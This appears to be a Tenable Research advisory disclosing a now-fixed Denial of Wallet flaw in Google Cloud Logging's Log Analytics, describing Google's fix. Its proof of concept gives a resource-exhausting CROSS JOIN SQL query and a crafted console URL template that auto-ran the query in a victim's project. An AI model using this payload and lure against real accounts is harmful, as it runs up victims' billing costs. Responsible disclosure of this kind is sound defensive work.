Synopsis
Tenable Research has identified and responsibly disclosed a Denial of Wallet (DoW) vulnerability in Google Cloud Logging's Log Analytics. This vulnerability allowed an attacker to force a victim's project to execute massive, expensive BigQuery queries by visiting a maliciously crafted Cloud Logging URL.
When a user navigates to a Log Analytics URL, the embedded SQL query is automatically submitted, even when set to use the BigQuery engine. An attacker could exploit this by crafting a URL containing a "resource-exhaustion" query. By using multiple CROSS JOIN statements against massive public datasets (e.g., bigquery-public-data), the query can be designed to process terabytes of data. Because the BigQuery jobs are initiated within the victim's project, the costs associated with the query processing are billed directly to the victim's billing account. When the victim navigates to the URL, they may incur significant expenses or exhaust their quota.
Proof of Concept:
- Create a malicious query that will process a massive amount of data:
SELECT *
FROM
`[VICTIM_PROJECT].global._Default._AllLogs`
CROSS JOIN `bigquery-public-data.[PUBLIC_DATASET].[PUBLIC_TABLE]`
CROSS JOIN `bigquery-public-data.[PUBLIC_DATASET2].[PUBLIC_TABLE2]`
-- Add many more CROSS JOINS to incur more costs
- Craft a Log Analytics URL that will run the query in the victim’s project:
https://console.cloud.google.com/logs/analytics;queriedResources=%7B%22resources%22:%5B%22projects%2F[VICTIM_PROJECT]%2Flocations%2Fglobal%2Fbuckets%2F_Default%2Fviews%2F_AllLogs%22%5D%7D;queryHandle=%7B%22query%22:%22[MALICIOUS_QUERY]%22%7D;upperTab=query;lowerTab=query_results;queryLanguage=SQL;useReservedSlots=true?project=[VICTIM_PROJECT]&chartConfig=%7B%22xyChart%22:%7B%22constantLines%22:%5B%5D,%22dataSets%22:%5B%7B%22breakdowns%22:%5B%5D,%22dimensions%22:%5B%7B%22column%22:%22%22,%22columnType%22:%22%22,%22sortColumn%22:%22%22,%22sortOrder%22:%22SORT_ORDER_ASCENDING%22%7D%5D,%22measures%22:%5B%7B%22aggregationFunction%22:%7B%22parameters%22:%5B%5D,%22type%22:%22count%22%7D,%22column%22:%22%22%7D%5D,%22opsAnalyticsQuery%22:%7B%22queryExecutionRules%22:%7B%22useReservedSlots%22:true%7D,%22queryHandle%22:%22%22,%22sql%22:%22[MALICIOUS_QUERY]%22%7D,%22plotType%22:%22STACKED_BAR%22,%22pointConnectionMethod%22:%22GAP_DETECTION%22,%22sortOrderParameters%22:%5B%5D,%22targetAxis%22:%22Y1%22%7D%5D,%22options%22:%7B%22mode%22:%22COLOR%22%7D,%22y1Axis%22:%7B%22label%22:%22%22,%22scale%22:%22LINEAR%22%7D%7D%7D
- Get the victim to browse to the new malicious URL, which will run the query automatically
Solution
Google has resolved the issue by stopping the automatic running of log analytics queries. Queries involving resources that do not share an ownership boundary will now display a warning message to ask users to check if the query is safe, and manually initiate running the query in charts, once confirmed.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]